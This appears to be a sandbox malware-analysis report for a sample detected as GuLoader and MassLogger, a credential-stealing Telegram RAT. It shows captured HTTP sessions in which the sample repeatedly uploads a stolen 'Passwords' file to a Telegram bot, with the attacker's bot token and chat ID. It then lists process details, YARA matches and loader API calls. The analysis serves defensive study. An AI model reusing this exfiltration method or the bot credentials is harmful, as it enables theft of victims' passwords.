2025-01-10 21:44:44 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 63 30 33 64 31 65 38 31 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd35c03d1e8178Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:45 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:45 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:45 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43662,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545485,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	50074	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:46 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd360fa29ea145 Host: api.telegram.org Content-Length: 1090
2025-01-10 21:44:46 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 30 66 61 32 39 65 61 31 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd360fa29ea145Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:46 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:46 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:46 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43663,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545486,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	50076	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:48 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd364c895051e4 Host: api.telegram.org Content-Length: 1090
2025-01-10 21:44:48 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 34 63 38 39 35 30 35 31 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd364c895051e4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:48 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:48 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43664,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545488,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	50078	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:49 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd36894d4ea567 Host: api.telegram.org Content-Length: 1090
2025-01-10 21:44:49 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 38 39 34 64 34 65 61 35 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd36894d4ea567Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:50 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:49 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:50 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43665,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545489,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	50080	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:51 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd36c493ff07a4 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:51 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 63 34 39 33 66 66 30 37 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd36c493ff07a4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:51 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:51 GMT Content-Type: application/json Content-Length: 546 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:51 UTC	546	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43666,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545491,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	50082	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:52 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd370e456300b2 Host: api.telegram.org Content-Length: 1090
2025-01-10 21:44:52 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 37 30 65 34 35 36 33 30 30 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd370e456300b2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:53 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:53 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:53 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 39 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43667,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545493,"document":{"file_n

Target ID:	0
Start time:	16:42:46
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\b5BQbAhwVD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\b5BQbAhwVD.exe"
Imagebase:	0x400000
File size:	1'050'481 bytes
MD5 hash:	8E4A2B26B311D9E5C9A920186B0B8025
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2385539475.0000000003DC5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:43:13
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\b5BQbAhwVD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\b5BQbAhwVD.exe"
Imagebase:	0x400000
File size:	1'050'481 bytes
MD5 hash:	8E4A2B26B311D9E5C9A920186B0B8025
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.8%
Total number of Nodes:	1592
Total number of Limit Nodes:	39

Executed Functions

Function 004034A5 Relevance: 84.4, APIs: 32, Strings: 16, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004034C8
GetVersion.KERNEL32 ref: 004034CE
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
OleInitialize.OLE32(00000000), ref: 00403545
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
CharNextW.USER32(00000000,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00000020,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00000000,?,00000006,00000008,0000000A), ref: 004035AE

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
ExitProcess.KERNEL32 ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
CopyFileW.KERNEL32(C:\Users\user\Desktop\b5BQbAhwVD.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
OpenProcessToken.ADVAPI32(00000000), ref: 00403960
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
AdjustTokenPrivileges.ADVAPI32 ref: 00403998
ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
ExitProcess.KERNEL32 ref: 004039E0

Strings

C:\Users\user\Desktop\b5BQbAhwVD.exe, xrefs: 004038F8
C:\Users\user\AppData\Local\Iw, xrefs: 004036CB, 004037EB, 00403895, 0040389F
TMP, xrefs: 00403735
TEMP, xrefs: 0040372D
Low, xrefs: 0040371B
UXTHEME, xrefs: 004034F5, 004034FA, 00403500
~nsu, xrefs: 00403845
\Temp, xrefs: 004036FF
Error launching installer, xrefs: 004037D0
1033, xrefs: 00403749
.tmp, xrefs: 00403861
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034BC
"C:\Users\user\Desktop\b5BQbAhwVD.exe", xrefs: 0040357C, 00403582, 00403776
SeShutdownPrivilege, xrefs: 0040396F
